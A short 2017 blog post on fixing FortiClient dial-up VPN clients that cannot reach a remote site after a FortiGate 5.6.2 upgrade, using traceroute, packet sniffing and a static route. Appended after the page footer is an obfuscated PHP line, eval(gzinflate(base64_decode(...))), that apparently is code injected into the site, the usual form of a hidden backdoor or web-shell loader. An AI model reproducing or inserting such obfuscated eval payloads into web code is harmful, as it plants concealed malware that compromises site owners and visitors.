« //

FortiClient can’t connect over dail-up VPN to remote site

Posted on November 29th, 2017 by Bert Zefat

After upgrading from 5.2.x or 5.4.x to 5.6.2 it is possible that FortiClient VPN connected clients can not access a remote site over VPN anymore from the FortiGate that they are connecting to.
The local LAN is accessible, but the remote LAN is not.

It seems there is a routing issue in the 5.6.2 OS. If you do

# execute traceroute <ip-address>

you will see the first IP adres beeing an IP address that is not defined in the Dail-up FortiGate.

You must add a static route at the remote site with the IP range of the IPsec client IP adresses.

With

# diagnose sniffer packet <interface> 'host <ip adress>'

you must see a ping request and reply on both the source FortiGate and the remote FortiGate.

Tags: Fortigate, Security // Add Comment »

Comments are closed.

« //
eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>